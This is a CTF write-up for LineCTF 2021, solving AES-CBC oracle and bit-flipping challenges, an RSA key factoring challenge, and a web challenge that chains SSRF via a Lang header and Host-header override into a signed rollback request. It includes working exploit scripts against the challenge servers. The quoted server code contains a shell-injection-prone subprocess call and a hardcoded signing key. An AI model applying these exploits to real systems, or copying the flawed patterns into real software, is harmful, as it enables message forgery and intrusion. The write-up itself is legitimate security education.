LineCTF 2021

Categories index
Crypto - Web

Crypto

babycrypto1

nc 35.200.115.41 16001

This challenge was quite a ride! The solution we ended up using is more complicated than it needed to be, so we’ll present both the easy solution and our alternative one.

These first two crypto challenges are based on AES-CBC 128 cipher and involve some common attacks on this mode of operation.

As a reminder, this is the decryption scheme of CBC.

AES-CBC decrypt

Here follows the script being served:

#!/usr/bin/env python
from base64 import b64decode
from base64 import b64encode
import socket
import multiprocessing

from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import hashlib
import sys

class AESCipher:
    """AES-CBC helper that exchanges messages as base64(IV || ciphertext)."""

    def __init__(self, key):
        """Store the AES key used by every subsequent operation."""
        self.key = key

    def encrypt(self, data):
        """Encrypt `data` under a freshly generated random IV.

        The plaintext is padded to the AES block size and the IV is
        prepended to the ciphertext before base64-encoding the result.
        """
        iv = get_random_bytes(AES.block_size)
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return b64encode(iv + self.cipher.encrypt(pad(data,
            AES.block_size)))

    def encrypt_iv(self, data, iv):
        """Encrypt `data` like `encrypt`, but under the caller-supplied `iv`.

        This is the primitive exposed to clients as the "cipher oracle".
        """
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return b64encode(iv + self.cipher.encrypt(pad(data,
            AES.block_size)))

    def decrypt(self, data):
        """Decrypt a base64 message and return the unpadded plaintext.

        The first block of the decoded input is used as the IV, so whoever
        builds the message also chooses the IV.
        """
        raw = b64decode(data)
        self.cipher = AES.new(self.key, AES.MODE_CBC, raw[:AES.block_size])
        return unpad(self.cipher.decrypt(raw[AES.block_size:]), AES.block_size)

flag = open("flag", "rb").read().strip()

COMMAND = [b'test',b'show']

def run_server(client, aes_key, token):
    """Handle one client connection of the babycrypto1 challenge.

    Sends the encrypted ``token + b'test'`` command, offers a single
    encryption with a client-chosen IV and message, then decrypts and echoes
    client commands until one decrypts to ``token + b'show'``.
    """
    # Sample ciphertext: token followed by COMMAND[0], under a random IV.
    client.send(b'test Command: ' + AESCipher(aes_key).encrypt(token+COMMAND[0]) + b'\n')
    client.send(b'**Cipher oracle**\n')
    client.send(b'IV...: ')
    # Each value is read with a single recv(); both are base64 text.
    iv = b64decode(client.recv(1024).decode().strip())
    client.send(b'Message...: ')
    msg = b64decode(client.recv(1024).decode().strip())
    # One-shot oracle: encrypts the client's message under the client's IV.
    client.send(b'Ciphertext:' + AESCipher(aes_key).encrypt_iv(msg,iv) + b'\n\n')
    while(True):
        client.send(b'Enter your command: ')
        tt = client.recv(1024).strip()
        tt2 = AESCipher(aes_key).decrypt(tt)
        # The decrypted plaintext is echoed back whether or not it matches.
        client.send(tt2 + b'\n')
        if tt2 == token+COMMAND[1]:
            client.send(b'The flag is: ' + flag)
            client.close()
            break

if __name__ == '__main__':
    # Listen on TCP port 16001 on all interfaces.
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', 16001))
    server.listen(1)

    while True:
        client, address = server.accept()

        # Every connection gets its own random key and token.
        aes_key = get_random_bytes(AES.block_size)
        # Base64 text truncated to AES.block_size*10 characters, so the token
        # length is a whole number of AES blocks.
        token = b64encode(get_random_bytes(AES.block_size*10))[:AES.block_size*10]

        # Each client is served in its own daemon process.
        process = multiprocessing.Process(target=run_server, args=(client, aes_key, token))
        process.daemon = True
        process.start()

That cipher oracle is a serious problem: since it lets us encrypt an arbitrary Message under an arbitrary IV, and given how CBC chains blocks together, we can use it to alter an already encrypted message.

Furthermore, we have an encrypted token + "test" message and, luckily for us, the end of the token coincides with the end of a block. This means that the test command sits in a block of its own…

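Knowing these two things, we give the cipher oracle the ciphertext block that precedes the test block as its IV (in CBC, the previous ciphertext block plays the role of the IV for the next block) and ask it to encrypt show. The resulting block can then replace the original last block.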

from pwn import *

# Exploit for babycrypto1 using the cipher oracle: replace the final
# "test" block of the sample ciphertext with an oracle-made "show" block.

BLOCK = 16                # AES block size in bytes
TOKEN_LEN = 10 * BLOCK    # the token fills exactly ten blocks

conn = remote('35.200.115.41', 16001)

log.info('get test command')
conn.recvuntil(b'test Command:')
test_cmd_enc = b64d(conn.recvline().strip())
iv = test_cmd_enc[:BLOCK]
enc_msg = test_cmd_enc[BLOCK:]

# Ciphertext of the last token block. CBC XORs it into the block that
# follows, so the oracle must use it as the IV for our replacement block.
prev_block = enc_msg[TOKEN_LEN - BLOCK:TOKEN_LEN]

log.info('cipher oracle')
# Answer each prompt only once it has arrived: the server reads every value
# with a single recv(1024), so two lines sent back-to-back could be read as
# one value.
conn.sendlineafter(b'IV...: ', b64e(prev_block).encode())
conn.sendlineafter(b'Message...: ', b64e(b'show').encode())
conn.recvuntil(b'Ciphertext:')
ct_no_iv = b64d(conn.recvline().strip())[BLOCK:]

log.info('forge command')
forged = iv + enc_msg[:TOKEN_LEN] + ct_no_iv
conn.sendlineafter(b'Enter your command: ', b64e(forged).encode())

# Print whatever the server sends until it closes the connection.
try:
    while True:
        print(conn.recv())
except EOFError:
    pass
finally:
    conn.close()

And now, the creative alternative way… 😆

This challenge could also be solved without using the cipher oracle, by applying a recursive Bit Flipping attack instead. On a side note, this attack is also the intended way to solve the next challenge.

The idea is simple: in AES-CBC, modifying the ciphertext of one block lets us change the plaintext of the next block in a controlled way, at the cost of garbling the plaintext of the block we modified.

Conveniently for us:

  • There isn’t a limit to the decryptable messages

  • The IV can be changed, since the server uses the one prepended to the message rather than a fixed one

  • The initial encrypted message with the token and the test message can be sent back to retrieve the token

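Working backwards, we first modify the ciphertext so that the last block decrypts to show instead of test, which garbles the token block before it. XORing that garbled plaintext with the corresponding part of the real token tells us how to patch the preceding ciphertext block (and, for the very first block, the IV). Repeating this procedure block by block yields a valid token + show message and retrieves the flag.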

from pwn import *

# Exploit for babycrypto1 without the cipher oracle: flip "test" into "show"
# and then repair the garbled token blocks one by one, back to front, using
# the plaintext the server echoes for every command.

BLOCK = 16                           # AES block size in bytes
TOKEN_LEN = 10 * BLOCK               # the token fills exactly ten blocks
MSG_LEN = TOKEN_LEN + len(b'show')   # length of the unpadded echoed plaintext
PROMPT = b'Enter your command: '


def query(conn, iv, enc_msg):
    """Send iv + enc_msg as a command and return the echoed plaintext.

    The echo is read by length rather than by line: a garbled block is
    random bytes and may contain newlines or leading/trailing whitespace,
    which recvline().strip() would truncate or misalign.
    """
    conn.sendlineafter(PROMPT, b64e(iv + enc_msg).encode())
    return conn.recvn(MSG_LEN)


conn = remote('35.200.115.41', 16001)

log.info('get test command')
conn.recvuntil(b'test Command:')
test_cmd_enc = b64d(conn.recvline().strip())
iv = test_cmd_enc[:BLOCK]
enc_msg = test_cmd_enc[BLOCK:]

log.info('skip cipher oracle')
# The oracle answer is not used; any well-formed input gets us past it.
conn.sendlineafter(b'IV...: ', b'/0otYvyOVhXqYNOtTkiLpg==')
conn.sendlineafter(b'Message...: ', b'show')

log.info('get token')
# Sending the sample ciphertext back makes the server echo token + b'test'.
token = query(conn, iv, enc_msg)[:TOKEN_LEN]

# change test -> show in block #11 by patching the ciphertext of block #10
log.info('change command')
cmd_at = TOKEN_LEN - BLOCK
enc_msg = (enc_msg[:cmd_at]
           + xor(xor(b'test', b'show'), enc_msg[cmd_at:cmd_at + 4])
           + enc_msg[cmd_at + 4:])
plain = query(conn, iv, enc_msg)

# Fix token for block #10 to #2
_log = log.progress('fix previous blocks')
for block_start in range(TOKEN_LEN - BLOCK, 0, -BLOCK):
    _log.status(f'block {block_start // BLOCK + 1}')
    block_end = block_start + BLOCK
    prev_start = block_start - BLOCK

    scramble_block = plain[block_start:block_end]
    token_block = token[block_start:block_end]
    log.debug(f"s: {scramble_block}")
    log.debug(f"t: {token_block}")

    # XORing (garbled ^ wanted) into the previous ciphertext block restores
    # this block's plaintext, and garbles the previous block in turn.
    fix_str = xor(scramble_block, token_block)
    enc_msg = (enc_msg[:prev_start]
               + xor(fix_str, enc_msg[prev_start:block_start])
               + enc_msg[block_start:])

    plain = query(conn, iv, enc_msg)
_log.success('done')

log.info('change iv to fix first block')
# Block #1 has no previous ciphertext block; its "previous block" is the IV.
fix_str = xor(plain[:BLOCK], token[:BLOCK])
conn.sendlineafter(PROMPT, b64e(xor(iv, fix_str) + enc_msg).encode())

# Print whatever the server sends (echo + flag) until it closes the socket.
try:
    while True:
        print(conn.recv())
except EOFError:
    pass
finally:
    conn.close()

🏁 LINECTF{warming_up_crypto_YEAH}

babycrypto2

nc 35.200.39.68 16002

This is similar to the previous challenge, babycrypto1.

...
flag = open("flag", "rb").read().strip()

AES_KEY = get_random_bytes(AES.block_size)
TOKEN = b64encode(get_random_bytes(AES.block_size*10-1))
COMMAND = [b'test',b'show']
PREFIX = b'Command: '

def run_server(client):
    """Handle one client connection of the babycrypto2 challenge.

    Sends the encrypted ``PREFIX + b'test' + TOKEN`` message, then decrypts
    and echoes client commands until one decrypts to
    ``PREFIX + b'show' + TOKEN``.
    """
    # The command now comes right after PREFIX, ahead of TOKEN.
    client.send(b'test Command: ' + AESCipher(AES_KEY).encrypt(PREFIX+COMMAND[0]+TOKEN) + b'\n')
    while(True):
        client.send(b'Enter your command: ')
        tt = client.recv(1024).strip()
        tt2 = AESCipher(AES_KEY).decrypt(tt)
        # The decrypted plaintext is echoed back whether or not it matches.
        client.send(tt2 + b'\n')
        if tt2 == PREFIX+COMMAND[1]+TOKEN:
            client.send(b'The flag is: ' + flag)
            client.close()
            break

if __name__ == '__main__':
...
        process = multiprocessing.Process(target=run_server, args=(client, ))
...

The Cipher Oracle is now gone and the only thing we can change is the IV of the message since it’s still read from the first 16 bytes of the sent message.

Previously the command was appended as the last block, now it’s at the beginning after a prefix PREFIX = b'Command: '.

Observe that the PREFIX + command are well within the 16 bytes limit of the first block.

Using the Bit Flipping Attack we can modify the IV to change the test bytes in the first block to show, without having to worry about messing up previous blocks.

AES-CBC Bit Flipping

from base64 import b64decode, b64encode

BLOCK = 16  # AES block size in bytes; the IV is the first block of the message


def flip_command(test_cmd, old=b'test', new=b'show', offset=len(b'Command: ')):
    """Rewrite `old` into `new` inside the first plaintext block via the IV.

    In CBC the first plaintext block is D(C1) XOR IV, so XORing
    ``old[i] ^ new[i]`` into IV byte ``offset + i`` turns plaintext byte
    ``offset + i`` from ``old[i]`` into ``new[i]`` without touching anything
    else.

    Args:
        test_cmd: base64 of IV || ciphertext as received from the server.
        old: bytes currently at `offset` in the first plaintext block.
        new: replacement bytes; must be as long as `old`.
        offset: position of `old` in the first block (defaults to the length
            of the b'Command: ' prefix).

    Returns:
        The forged message, base64-encoded, as bytes.

    Raises:
        ValueError: if `old` and `new` differ in length, if the patched
            range does not fit in the IV, or if the message is shorter than
            one block.
    """
    if len(old) != len(new):
        raise ValueError('old and new must have the same length')
    if offset < 0 or offset + len(old) > BLOCK:
        raise ValueError('patched range must lie within the first block')

    msg = bytearray(b64decode(test_cmd))
    if len(msg) < BLOCK:
        raise ValueError('message is shorter than one block')

    for i, (was, want) in enumerate(zip(old, new), start=offset):
        msg[i] ^= was ^ want
    return b64encode(bytes(msg))


if __name__ == '__main__':
    test_cmd = "b64encoded_received_msg"  # paste the value sent by the server

    print(flip_command(test_cmd))

🏁 LINECTF{echidna_kawaii_and_crypto_is_difficult}

babycrypto3

Please decrypt and get flag.

Flag is LINECTF{<decrypted text>} and decrypted text is human-readable text.

-----BEGIN PUBLIC KEY-----
ME0wDQYJKoZIhvcNAQEBBQADPAAwOQIyAyixQTmi5UuIpGYvGmfMOs0ZKcm2J5S7
ZJFq/wKZH4BFbk0O7U1ZHfdwjVry6bT7VokCAwEAAQ==
-----END PUBLIC KEY-----

Here we have a public key with a related ciphertext.

RsaCtfTool to the rescue… In fact, after a few minutes we find that the SageMath-based cm_factor attack succeeded!

$ py RsaCtfTool.py --publickey pub.pem --uncipherfile ciphertext.txt --attack cm_factor
...
[*] Attack success with cm_factor method !
...
STR : b'\x00\x02`g\xff\x85\x1e\xcd\xcba\xe5\x0b\x83\xa5\x15\xe3\x00Q0xPU0lORyBUSEUgRElTVEFOQ0UuCg==\n'

$ echo "Q0xPU0lORyBUSEUgRElTVEFOQ0UuCg==" | base64 -d
CLOSING THE DISTANCE.

🏁 LINECTF{CLOSING THE DISTANCE.}


Web

diveinternal

Target the server’s internal entries, access admin, and roll back.
Keytime: Asia/Japan

http://xxx.xxx.xxx.xxx/

After navigating to the challenge’s IP, we are presented with a page that contains what looks like a crypto ticker, refreshing every five seconds.

diveinternals Home

The About page doesn’t contain anything interesting at first glance, and the Subscribe page lets us enter an email address and replies with a simple text-only confirmation.

diveinternals Subscribe

So, given the challenge’s description, we should:

  1. Target the server’s internal entries
  2. Access admin
  3. Roll back

…whatever those mean. Luckily enough the source code for the challenge was given, and the team at LINE was nice enough to package everything up in Docker containers and provide a docker-compose config to reproduce their deployment on your machine. Here’s a relevant excerpt (screen space is a premium resource):

services:
    nginx:
        build:
            context: ./nginx/
        ports:
            - "12004:80"
        networks:
            - ctf-network
    public:
        build:
            context: ./public/
        networks:
            - ctf-network
    private:
        build: ./private/
        networks:
            - ctf-network
        environment:
            - 'RUN=flask run --host=0.0.0.0 --port=5000'
            - DBFILE=database/master.db
networks:
   ctf-network:

So, what do we have here? First things first, let’s note that all the services will be running unrestricted in a common virtual network, so they’ll be reachable from each other by using their service name as hostname.

An NGINX instance that reverse-proxies the public container, judging by the config in its build dir:

server {
    location / {
        proxy_pass http://public:3000;
    }
}

Note: the complete config file had several more Lua shenanigans messing with caching and headers formatting, none of which I’ve recognized as useful for solving this challenge but may have given additional insights. If anything, some headers rewriting could have been needed to actually make the intended exploit work.

Next we have the public service, which apparently is just a frontend that calls to the private backend. Here are the relevant routes definitions, with context added where needed:

// Host and port of the backend that every route below forwards to.
const target = 'private:5000';

// GET /apis/ — forwards the client's request headers unchanged to the
// backend root and renders the backend's response body into the index view.
router.get('/apis/', function(req, res, next) {
  request({
    headers: req.headers,
    uri: `http://${target}/`,
  }, function(err, data){
    // NOTE(review): `err` is not checked before `data.body` is read.
    res.render('index', { title: 'apis' , data: data.body});
  });

});

// GET /apis/addsub — forwards only the `email` query parameter to the
// backend's /addsub endpoint and streams the backend's reply to the client.
router.get('/apis/addsub', function(req, res, next) {
  request({
    uri: `http://${target}/addsub`,
    qs: { email: req.query.email }
  }).pipe(res);
});

We can already see that the only ways we have to interact with the private backend are through GETting its root with some headers or through an email query parameter directed at the addsub endpoint.

Cutting to the juicy bits, here’s a portion of the private service, rewritten and minimized as needed (that is to say: don’t try to paste this in an interpreter, it won’t work):

privateKey = b'let\'sbitcorinparty'

# Keeps the hash of the database file and a key derived from that hash.
class Activity():
    def __init__(self):
        # dbHash: hex MD5 of the current contents of database/master.db.
        self.dbHash = hashlib.md5(open('database/master.db','rb').read()).hexdigest()
        # integrityKey: hex SHA-512 of the ASCII dbHash string.
        self.integrityKey = hashlib.sha512((self.dbHash).encode('ascii')).hexdigest()

    # Validates `key` against integrityKey; when the supplied `dbHash`
    # differs from the stored one, runs RunRollbackDB and returns its result.
    def IntegrityCheck(self,key, dbHash):
        if self.integrityKey != key:
            # Return invalid key error
        # A rollback is only attempted for a hash other than the current one.
        if self.dbHash != dbHash:
            flag = RunRollbackDB(dbHash)
            # Re-hash the database and refresh both derived values.
            file = open('database/master.db','rb').read()
            self.dbHash = hashlib.md5(file).hexdigest()
            self.integrityKey = hashlib.sha512((self.dbHash).encode('ascii')).hexdigest()
            return flag
        return "DB is safe!"

    # Registers the periodic jobs (every 6 s and every 2 s).
    # NOTE(review): UpdateIntegrityKey and BackupDB are not part of this
    # excerpt; their behaviour is presumably what their names suggest.
    def run(self):
        schedule.every(6).seconds.do(self.IntegrityCheck)
        schedule.every(2).seconds.do(self.UpdateIntegrityKey)
        schedule.every(2).seconds.do(self.BackupDB)

# Downloads `url` and stores it in backup/ under the URL's last path segment.
def WriteFile(url):
    # Everything after the final '/' becomes the local file name.
    local_filename = url.split('/')[-1]
    with requests.get(url, stream=True) as r:
        with open('backup/'+local_filename, 'wb') as f:
            # Write the contents of the response in the file

# Resolves the value to place in the response's Lang header.
# Without a Lang request header the result is "en". Otherwise the header is
# filtered and fetched as a path on request.host_url; the fetched body is
# returned on HTTP 200, and the raw header value in every other case.
def LanguageNomarize(request):
    if request.headers.get('Lang') is None:
        return "en"
    else:
        # Matches values that start with one of ! @ # $ / . and contain a '/'.
        regex = '^[!@#$\\/.].*/.*' # Easy~~
        language = request.headers.get('Lang')
        # Strip %00, %0d, %0a, the characters ! @ # $ ^ and any "../".
        language = re.sub(r'%00|%0d|%0a|[!@#$^]|\.\./', '', language)
        # Filtered values that still match are not fetched; echo the header.
        if re.search(regex,language):
            return request.headers.get('Lang')
        try:
            # The target host comes from request.host_url, and all incoming
            # request headers are forwarded with the outgoing request.
            data = requests.get(request.host_url+language, headers=request.headers)
            if data.status_code == 200:
                return data.text
            else:
                return request.headers.get('Lang')
        except:
            return request.headers.get('Lang')

def SignCheck(request):
    # True when the Sign header equals the hex HMAC-SHA512 of the raw query
    # string, keyed with privateKey.
    expected = hmac.new(privateKey , request.query_string, hashlib.sha512).hexdigest()
    provided = request.headers.get('Sign')
    return expected == provided

# GET /en — always answers with the literal text 'en'.
@app.route('/en', methods=['GET'])
def en():
    return 'en'

# GET /coin — returns the coin data as JSON and sets the response's Lang
# header to whatever LanguageNomarize produced for this request.
@app.route('/coin', methods=['GET'])
def coin():
    response = app.response_class()
    language = LanguageNomarize(request)
    # The resolved value is handed back to the caller in a response header.
    response.headers["Lang"] = language
    data = getCoinInfo()
    response.data = json.dumps(data)
    return response

@app.route('/download', methods=['GET'])
def download():
    if !SignCheck(request):
        # Return invalid signing key error
    src = request.args.get('src')
    if src == None:
        # Return missing resource error
    WriteFile(src)
    # Return success message

# GET /addsub — accepts the `email` query parameter when it is present, at
# most 100 characters long, and matches the pattern below.
@app.route('/addsub', methods=['GET'])
def addsub():
    # Lowercase letters/digits, at most one '.' or '_' in the local part, a
    # single '@', and a 2-3 character suffix after the dot.
    regex = '^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$'
    email = request.args.get('email')
    if (email is None) or (len(email)>100):
        # Return invalid email error
    if re.search(regex,email):
        # Add subscriber to DB and return success message
    else:
        # Return invalid email error

# GET /integrityStatus — returns the database path and the current dbHash as
# JSON; no signature or key is checked here.
@app.route('/integrityStatus', methods=['GET'])
def integritycheck():
    data = {'db':'database/master.db','dbhash':activity.dbHash}
    return json.dumps(data)

@app.route('/rollback', methods=['GET'])
def rollback():
    if !SignCheck(request):
        # Return invalid signing key error
    if request.headers.get('Key') == None:
        # Return invalid key error
    result  = activity.IntegrityCheck(request.headers.get('Key'),request.args.get('dbhash'))
    return result

def RunRollbackDB(dbhash):
    """Return the contents of FLAG when backup/<dbhash> is an existing file.

    Non-alphanumeric characters are dropped from `dbhash` before the lookup.
    Returns "dbhash is None" for a missing argument and "Where is file?"
    when no such backup file exists.
    """
    if dbhash is None:
        return "dbhash is None"

    backup_name = ''.join(ch for ch in dbhash if ch.isalnum())
    if not os.path.isfile('backup/' + backup_name):
        return "Where is file?"

    with open('FLAG', 'r') as handle:
        return handle.read()

# Empties backup/ and copies database/master.db to backup/<dbhash>; returns
# dbhash. The `remove` parameter is not used in this excerpt.
def RunbackupDB(remove, dbhash):
    # Wipes everything in backup/, including files written by WriteFile.
    subprocess.Popen(r'rm backup/*' , shell=True).wait()
    # NOTE(review): dbhash is concatenated into a shell command line.
    subprocess.Popen(r'cp ' + 'database/master.db' + ' backup/' + dbhash, shell=True).wait()
    return dbhash

Summarizing a couple of things:

  • Every few seconds a background thread updates the integrityKey and the dbHash, both derived from the MD5 sum of the current contents of the DB.
    • We can get the base hash from the /integrityStatus endpoint and calculate the rest by copying the service’s code.
  • Likewise, we can sign our own requests since we have the code of the SignCheck function as well as the private key used in it.
  • To get the flag, we have to call the RunRollbackDB function somehow, passing it the name of a file that exists in the /backup folder.
    • A background worker cleans that directory every couple of seconds and puts there a backup of the current DB.
    • Since IntegrityCheck only lets us roll back to a version of the DB that does not match the current hash, we can’t trigger a rollback with only the information that /integrityStatus gives us.
  • The LanguageNomarize parser tries to resolve a URL that includes a user-controlled segment.
    • We can leverage that from the /coin endpoint.
    • A filtering RegEx prevents HTTP request hijacks based on carriage returns and newlines.

From these observations, a rather weird path to exploitation can be devised:

  1. SSRF via the Lang header in the /apis/coin endpoint of the public service.
    • Hijack the target host to private:5000 via the Host header.
  2. Obtain dbHash from /integrityStatus.
    • Use it to calculate Sign (affected by query string) and Key (affected by DB contents) headers as needed.
  3. Make the API “download itself” in the backup directory by calling the private /download endpoint, using http://localhost:5000/integrityStatus to generate some data.
    • This will create a file named “integrityStatus” in the backup directory that will exist until the next scheduled cleanup cycle. The contents of that file aren’t important; any other endpoint could have been used.
  4. Use the name of the downloaded file to trigger a rollback through the private /rollback endpoint.
  5. If all went well, the Lang header of the response should be populated with the flag.
    • Since this attack depends on exact timings and the environment is shared between all the CTF participants, it may take a few tries to succeed in a live environment.
#!/usr/bin/env python3

import hashlib, hmac, json, requests

HOST = 'xxx.xxx.xxx.xxx'

# Pulled from /private/app/main.py @ L21
privateKey = b'let\'sbitcorinparty'

# Pulled from /private/app/main.py @ L61
def integrityKey(dbHash):
  """Return the hex SHA-512 digest of the ASCII-encoded `dbHash` string."""
  return hashlib.sha512(dbHash.encode('ascii')).hexdigest()

# Pulled from /private/app/main.py @ L152
def sign(query):
  """Return the hex HMAC-SHA512 of the ASCII-encoded `query`, keyed with privateKey."""
  mac = hmac.new(privateKey, msg=query.encode('ascii'), digestmod=hashlib.sha512)
  return mac.hexdigest()

def ssrf(path, **extra_headers):
  """Request `path` on the private backend through the public /apis/coin route.

  The Host header redirects the backend's own lookup to private:5000 and the
  Lang header carries the path (plus query string) to fetch. Returns the
  Lang header of the response, or '' when the header is missing.
  """
  headers = {'Host': 'private:5000', 'Lang': path}
  headers.update(extra_headers)
  response = requests.get(f'http://{HOST}/apis/coin', headers=headers, timeout=10)
  return response.headers.get('lang', '')


if __name__ == '__main__':
  i = 1
  while True:
    print(f'Try #{i}...', end='\r')

    try:
      # Get the hash of the current DB
      dbHash = json.loads(ssrf('integrityStatus'))['dbhash']

      # Make the API download itself in the backup dir
      query = 'src=http%3A%2F%2Flocalhost%3A5000%2FintegrityStatus'
      ssrf(f'download?{query}', Sign=sign(query))

      # Use the name of the downloaded file to trigger a rollback
      query = 'dbhash=integrityStatus'
      reply = ssrf(f'rollback?{query}', Sign=sign(query), Key=integrityKey(dbHash))
    except (requests.RequestException, ValueError, KeyError, TypeError) as err:
      # A failed request or a non-JSON answer is just another missed attempt;
      # retry instead of aborting the whole run.
      reply = f'request failed: {err}'

    # Multiple tries may be needed due to regular backup dir cleanup
    if 'LINECTF{' in reply:
      print(f'Flag found! {reply}')
      break
    else:
      print(f'Wrong timing, retrying (\'{reply}\')')
      i += 1

This challenge had quite a few distractions and dead ends built in but, as usual, the working exploit turned out to be conceptually simple.

🏁 LINECTF{YOUNGCHAYOUNGCHABITCOINADAMYMONEYISBURNING}